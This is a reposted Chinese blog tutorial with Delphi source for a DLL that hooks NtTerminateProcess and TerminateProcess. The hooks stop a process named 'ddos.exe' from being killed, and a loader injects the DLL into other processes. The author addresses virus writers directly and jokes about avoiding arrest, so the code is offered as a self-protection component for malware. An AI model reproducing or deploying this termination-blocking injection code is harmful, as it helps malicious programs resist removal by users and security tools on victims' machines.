zoukankan      html  css  js  c++  java
  • hook api 保护进程

    hook api 保护进程

    用过卡巴斯基的朋友都知道,卡巴斯基的进程是无法杀掉的,在任务管理器中杀卡巴进程的话,会弹

    出一个消息框提示拒绝访问!那么这是怎么实现的呢?很简单,就是使用了HOOK API的方法。

    兄弟门,做毒别做地根武汉那小子那么傻,有本事你也得搁着点,别去进局子!


    我用delphi来写程序好了,先写个dll。

    const 
    PRG_NAME = 'ddos.exe';

    var TerminateProcessNext : function (processHandle, exitCode: dword) : bool; stdcall; 
    NtTerminateProcessNext : function (processHandle, exitCode: dword) : dword; stdcall; 


    {$R *.res}
    function ThisIsOurProcess(processHandle: dword) : boolean; 
    var pid : dword; 
    arrCh : array [0..MAX_PATH] of char; 
    begin 
    pid := ProcessHandleToId(processHandle); 
    result := (pid <> 0) and ProcessIdToFileName(pid, arrCh) and 
    (PosText(PRG_NAME, arrCh) > 0); 
    end; 

    function TerminateProcessCallback(processHandle, exitCode: dword) : bool; stdcall; 
    begin 
    if ThisIsOurProcess(processHandle) then 
    begin 
    result := false; 
    SetLastError(ERROR_ACCESS_DENIED); 
    end 
    else 
    result := TerminateProcessNext(processHandle, exitCode); 

    end; 

    function NtTerminateProcessCallback(processHandle, exitCode: dword) : dword; stdcall; 
    const STATUS_ACCESS_DENIED = $C0000022; 
    begin 
    if ThisIsOurProcess(processHandle) then 
    begin 
    result := STATUS_ACCESS_DENIED 
    end 
    else 
    result := NtTerminateProcessNext(processHandle, exitCode); 
    end; 

    begin
    if GetVersion and $80000000 = 0 then 
    HookAPI( 'ntdll.dll', 'NtTerminateProcess', @NtTerminateProcessCallback,

    @NtTerminateProcessNext) 
    else HookAPI('kernel32.dll', 'TerminateProcess', @TerminateProcessCallback,

    @TerminateProcessNext); 
    end.
    再写个exe调用这个dll,把这个dll插入到系统进程中去。
    procedure inject; 
    begin 
    try 
    if not InjectLibrary((CURRENT_SESSION or CURRENT_PROCESS), 'hook.dll') then 
    begin
    ExitProcess(0); //如果没有把hook.dll插入到进程中去,那么程序就自动关闭
    end; 
    except 
    // 
    end; 
    end;


    procedure uninject; //把hook.dll从插入的进程中卸载掉
    begin 
    try 
    UninjectLibrary((CURRENT_SESSION or CURRENT_PROCESS), 'hook.dll');
    except 
    end; 
    end; 


    procedure TForm1.FormCreate(Sender: TObject);
    begin
    inject; //程序一启动就插入dll
    end;

    procedure TForm1.FormDestroy(Sender: TObject);
    begin
    uninject; //程序退出把dll从进程中卸载,保护进程功能也就失效了。
    end;

    ========================================================================================


    本文来自CSDN博客,转载请标明出处:http://blog.csdn.net/delphizhou/archive/2008/10/18/3095896.aspx

  • 相关阅读:
    Django REST framework+Vue 打造生鲜超市(十一)
    Django REST framework+Vue 打造生鲜超市(十)
    Django REST framework+Vue 打造生鲜超市(九)
    Django REST framework+Vue 打造生鲜超市(八)
    SVN服务器搭建和使用(二)
    SVN服务器搭建和使用(一)
    web前端性能优化
    js数组去重
    常见的字符串隐式转换
    js中this的用法
  • 原文地址:https://www.cnblogs.com/zerovirs/p/1759020.html
Copyright © 2011-2022 走看看